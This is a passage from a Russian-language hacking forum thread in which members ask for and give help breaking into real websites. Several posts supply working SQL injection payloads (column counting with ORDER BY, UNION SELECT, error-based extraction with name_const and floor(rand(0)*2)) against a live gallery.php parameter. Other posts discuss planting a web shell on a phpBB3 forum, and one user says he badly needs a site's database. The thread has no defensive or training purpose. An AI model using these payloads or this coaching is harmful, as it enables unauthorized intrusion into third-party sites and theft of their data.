Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://biophys.am:2082/
     
  2. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    eto cPanel
     
  3. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Для кого человек это писал? https://forum.antichat.ru/thread104591.html

    плохо читал видать :)
    если ошибки
    Code:
    MySQL server version for the right syntax to use near '[B][COLOR=Red]\[/COLOR][/B]'db156426_4[B][COLOR=Red]\[/COLOR][/B]' --' 
    Code:
    [B][COLOR=Red]Access denied[/COLOR][/B] for user 'db156426_4'@'127.0.0.2' to database 'mysql'
    тебе ни о чем не говорят,то я не знаю... :)
     
    #13263 .:[melkiy]:., 30 May 2010
    Last edited: 30 May 2010
  4. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Вот именно, что я это прочитал, делаю все как и написано, но ничего не получается.
    Что не так делаю?
     
  5. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    вот что выдает:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'abcd%' AND active = 'Y' ORDER BY 'ProductTitle' ASC LIMIT 0, 16' at line 1

    зы другой сайт
     
  6. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Есть форум phpbb3, залить шел через стиль невозможно, какие еще есть способы??
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    GOGA075 почему невозможно? у меня было такое что невозможно было редактировать стиль установленный, но если редактировал шаблон другого стиля и потом устанавливал его как основной , то все канало...
     
  8. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Gorev
    В этом форуме нету ни редактора стилей ни функции "разрешать php..."
    Админ видно удалил данные модули!!
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ну тогда видимо не получится через форумак залить
     
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    abcdsdjahsdjkhdjkhjkdhasdjkasdhjkh%' order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 --
    Если выведет 14, значит полей 13, и .т.п
    abcdsdjahsdjkhdjkhjkdhasdjkasdhjkh%' union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --
    ponel?
     
  11. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    есть один сайт. На сайте search.php без параметров. В окошко вводим ' получаем:
    как я понял уязвим. Но... Куда подставлять параметры, если в адресной строке search.php неизменен. То есть вся работа скрипта скрыта. Можно ли как нибудь докопаться?
     
  12. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    o_O
    А само поле для поиска не?
     
  13. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Модифицирую запрос разными способами. например в поля поиска введи or id= и так далее - дерзай ;)
     
  14. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    замучился уже с этим сайтом. Сижу уже за ним часов 12 (
    Нашел наконец то ошибку, которую можно вызвать через GET запрос

    hxxp://site.com/gallery.php?file=1'

    получаем на странице, кроме прочего контента (img всякие там):

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/gallery.php on line 35

    NetDevilZ SQL Scaner сказал, что это (Blind Injection), как я понял "слепая скуль". Но как же она слепая, если выдает ошибку?
    SQLI Helper 2.7 не смог ничего вытащить, показал лишь сервер и версию PHP
    Pangolin.Pro тоже не помог. Говорит Cannot detecte keyword! Где мне достать этот keyword я понятия не имею.
    Помогите, кто чем может. В какую сторону копать? Где почитать? Что мне вообще делать. База с сайта нужна, как никогда (кста установлен на Apache/2.0.52 (CentOS) PHP/5.1.6, то есть кроме как sql я наверное по другому к нему никак(( )

    ЗЫ есть полная структура сайта, полученая intelli tamper, есть phpinfo файл, есть пару полей, что POST методом выдают ошибку.
     
  15. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    ну крути как слепую можешь использовать метод floor(rand(0))
     
  16. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    hxxp://site.com/gallery.php?file=(select*from(select+name_const(version(),1),name_const(version(),1))a)
     
  17. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Я чесно сказать не понял, что ты хотел этим запросом добиться, но без изменени (что с параметром, что без)
    можно поподробней? Я вообще не представляю, с чего начать крутить ее.
     
  18. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    hxxp://site.com/gallery.php?file=1+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)

    лучше ссылку в студию если конечно сайт не в .ru зоне
     
  19. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Хочеться взять и ... :(

    Если ошибка есть, то может быть и слепая (О чудо, я открыл глаза на мир скулей? ).
    Ты бы лучше выложил ссылку.
    Ты вообще адекватный человек?
    Если ошибка PHP, ошибки Sql синтаксиса нету, причём здесь твой вывод через ошибку?
    Аналогично.


    // Будь тут Grey, он бы вам таких клизм вставил, что вы бы больше сюда незаходили :)

    2pinch, ну раз непомешан, чего советовать тогда?
     
    #13279 Ctacok, 31 May 2010
    Last edited: 31 May 2010
    1 person likes this.
  20. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    2 Ctacok подскажи в какую сторону рыть, с чего начать, где почитать. С меня могорыч)
     
Thread Status:
Not open for further replies.